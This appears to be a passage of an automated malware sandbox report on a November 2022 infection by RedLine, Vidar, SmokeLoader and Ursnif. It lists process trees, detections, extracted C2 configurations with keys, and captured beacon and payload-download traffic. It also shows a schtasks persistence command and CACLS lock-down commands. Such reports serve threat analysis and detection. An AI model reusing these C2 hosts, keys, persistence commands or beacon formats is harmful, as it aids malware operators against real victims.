Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000013.00000002.535069692.0000000000B01000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000013.00000002.525358193.0000000000930000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: schtasks.exePID: 1396, Parent PID: 4764

General

Target ID:	20
Start time:	10:38:23
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
Imagebase:	0xaf0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 6CEC.exePID: 4968, Parent PID: 3452

General

Target ID:	21
Start time:	10:38:23
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\6CEC.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\6CEC.exe
Imagebase:	0x400000
File size:	360448 bytes
MD5 hash:	28A6112DCB54CE6886F7D9ACB8A15E31
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: conhost.exePID: 2992, Parent PID: 1396

General

Target ID:	22
Start time:	10:38:24
Start date:	19/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exePID: 5972, Parent PID: 4764

General

Target ID:	23
Start time:	10:38:25
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y\|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 408, Parent PID: 4968

General

Target ID:	24
Start time:	10:38:26
Start date:	19/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 2436, Parent PID: 5972

General

Target ID:	25
Start time:	10:38:27
Start date:	19/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: 816F.exePID: 1172, Parent PID: 3452

General

Target ID:	26
Start time:	10:38:28
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\816F.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\816F.exe
Imagebase:	0x190000
File size:	228864 bytes
MD5 hash:	730A7A6F235525238EE33A2C046C2BA7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Analysis Process: cmd.exePID: 3012, Parent PID: 5972

General

Target ID:	27
Start time:	10:38:29
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: rovwer.exePID: 2560, Parent PID: 1080

General

Target ID:	28
Start time:	10:38:29
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
Imagebase:	0x400000
File size:	382464 bytes
MD5 hash:	5E08968D858224A33175069D64DC7F39
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cacls.exePID: 4392, Parent PID: 5972

General

Target ID:	29
Start time:	10:38:30
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "rovwer.exe" /P "user:N"
Imagebase:	0xc10000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: 86EE.exePID: 4972, Parent PID: 3452

General

Target ID:	30
Start time:	10:38:30
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\86EE.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\86EE.exe
Imagebase:	0x900000
File size:	341006 bytes
MD5 hash:	F46063253FF38E6B2452BF4410C5FEC0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Analysis Process: cacls.exePID: 4984, Parent PID: 5972

General

Target ID:	31
Start time:	10:38:31
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "rovwer.exe" /P "user:R" /E
Imagebase:	0xc10000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: 8C00.exePID: 5400, Parent PID: 3452

General

Target ID:	32
Start time:	10:38:31
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\8C00.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\8C00.exe
Imagebase:	0xbf0000
File size:	341006 bytes
MD5 hash:	F46063253FF38E6B2452BF4410C5FEC0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Analysis Process: vbc.exePID: 5496, Parent PID: 4968

General

Target ID:	33
Start time:	10:38:32
Start date:	19/11/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Imagebase:	0x1280000
File size:	2688096 bytes
MD5 hash:	B3A917344F5610BEEC562556F11300FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: 86EE.exePID: 5560, Parent PID: 4972

General

Target ID:	34
Start time:	10:38:32
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\86EE.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\86EE.exe
Imagebase:	0x900000
File size:	341006 bytes
MD5 hash:	F46063253FF38E6B2452BF4410C5FEC0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Analysis Process: explorer.exePID: 5612, Parent PID: 3452

General

Target ID:	35
Start time:	10:38:32
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xc20000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

Analysis Process: cmd.exePID: 5640, Parent PID: 5972

General

Target ID:	36
Start time:	10:38:32
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cacls.exePID: 5668, Parent PID: 5972

General

Target ID:	37
Start time:	10:38:32
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\99e342142d" /P "user:N"
Imagebase:	0xc10000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: explorer.exePID: 5928, Parent PID: 3452

General

Target ID:	40
Start time:	10:38:34
Start date:	19/11/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: 8C00.exePID: 5936, Parent PID: 5400

General

Target ID:	41
Start time:	10:38:34
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\8C00.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\8C00.exe
Imagebase:	0xbf0000
File size:	341006 bytes
MD5 hash:	F46063253FF38E6B2452BF4410C5FEC0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Analysis Process: explorer.exePID: 1768, Parent PID: 3452

General

Target ID:	42
Start time:	10:38:35
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xc20000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000002A.00000002.520066119.0000000000591000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

Analysis Process: cacls.exePID: 3124, Parent PID: 5972

General

Target ID:	43
Start time:	10:38:35
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\99e342142d" /P "user:R" /E
Imagebase:	0xc10000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: explorer.exePID: 5080, Parent PID: 3452

General

Target ID:	44
Start time:	10:38:36
Start date:	19/11/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000002C.00000002.520020559.00000000003D1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Analysis Process: 86EE.exePID: 5068, Parent PID: 5560

General

Target ID:	45
Start time:	10:38:38
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\86EE.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\86EE.exe
Imagebase:	0x900000
File size:	341006 bytes
MD5 hash:	F46063253FF38E6B2452BF4410C5FEC0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: explorer.exePID: 3780, Parent PID: 3452

General

Target ID:	46
Start time:	10:38:38
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xc20000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000002E.00000000.457780298.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

Disassembly

⊘No disassembly

Source: http://91.213.50.70/Wavafursq.jpeg	Avira URL Cloud: Label: malware
Source: http://116.202.5.101:80	Avira URL Cloud: Label: malware
Source: http://193.56.146.174/g84kvj4jck/index.php?scr=1kvj4jck/index.php	Avira URL Cloud: Label: malware
Source: http://193.56.146.174/g84kvj4jck/index.php?scr=1	Avira URL Cloud: Label: malware
Source: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dllming	Avira URL Cloud: Label: malware
Source: http://193.56.146.168/mia/solt.exe	Avira URL Cloud: Label: malware
Source: http://91.213.50.70/Wavafursq.jpeg&BKl:	Avira URL Cloud: Label: malware
Source: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dlltE	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	Metadefender: Detection: 71%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\453D.exe	ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	Metadefender: Detection: 71%	Perma Link

Source: 21.3.6CEC.exe.6c0000.0.unpack	Avira: Label: TR/Downloader.Gen2
Source: 19.3.6644.exe.940000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 19.2.6644.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 19.2.6644.exe.930e67.1.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: Traffic	Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49725 -> 77.232.37.228:80
Source: Traffic	Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49729 -> 77.232.37.228:80
Source: Traffic	Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49733 -> 77.232.37.228:80
Source: Traffic	Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.3:49738 -> 89.208.107.216:80

Source: Malware configuration extractor	URLs: 185.106.92.111:2510
Source: Malware configuration extractor	URLs: http://o3l3roozuidudu.com/
Source: Malware configuration extractor	URLs: http://o3npxslymcyfi2.com/
Source: Malware configuration extractor	URLs: http://o3b1wk8sfk74tf.com/
Source: Malware configuration extractor	URLs: https://t.me/deadftx
Source: Malware configuration extractor	URLs: https://www.tiktok.com/@user6068972597711

Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	Avira: detection malicious, Label: HEUR/AGEN.1233121
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	Avira: detection malicious, Label: HEUR/AGEN.1233121

Source: C:\Users\user\AppData\Local\Temp\3790.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\tiddsjj	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\453D.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\59FE.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6644.exe	Joe Sandbox ML: detected

Source: 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://t.me/deadftx", "https://www.tiktok.com/@user6068972597711"], "Botnet": "1148", "Version": "55.7"}
Source: 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "185.106.92.111:2510", "Bot Id": "New2022", "Authorization Header": "ef6fe7baf59e3191ff2f569e3bf0e2c7"}
Source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://o3l3roozuidudu.com/", "http://o3npxslymcyfi2.com/", "http://o3b1wk8sfk74tf.com/"]}
Source: 00000013.00000002.525358193.0000000000930000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Ursnif {"RSA Public Key": "9YTR8AStfTOVxekPy7nye/rJL/CYnuMKiTBMit/N9dFJomCZQw3gdJ20hYjZiaY5PCNTRgc/z2gXfPlfCRRq0/mF+oSBOgliUoJHNN6O1Nl/zAv1hC+MVoITbvAJoj6LnOzFs9h/l3E4DMphz+dHiiDgppDXx4StPfi30EoQByvOIhjndZV3g8kYMJyGj8dxlmi3X9wSz6RHT9/HWCOS/i2phbREwr7oohHwh6mObxVhJVx0tZ18f2U+SsDunGdf1nLcyWHfM0cx6e8zBNRaXlZ1HhTEFzQdz5EF2h+r74n2bFODhb+ozhtKQ1CBEf0hf+5D8mLZuH2C+VOO+s90bjJxpTvGseErYwzAwE2lC4o=", "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"], "botnet": "20", "server": "50", "serpent_key": "izoHlMTDxrB6IFB3", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Source: Joe Sandbox View	JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /1148 HTTP/1.1Host: 116.202.5.101
Source: global traffic	HTTP traffic detected: GET /659169136515.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODI4MjM=Host: 193.56.146.174Content-Length: 82975Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g84kvj4jck/Plugins/cred64.dll HTTP/1.1Host: 193.56.146.174
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Host: 193.56.146.174Content-Length: 21Content-Type: application/x-www-form-urlencodedData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 63 72 65 64 3d Data Ascii: id=853321935212&cred=
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
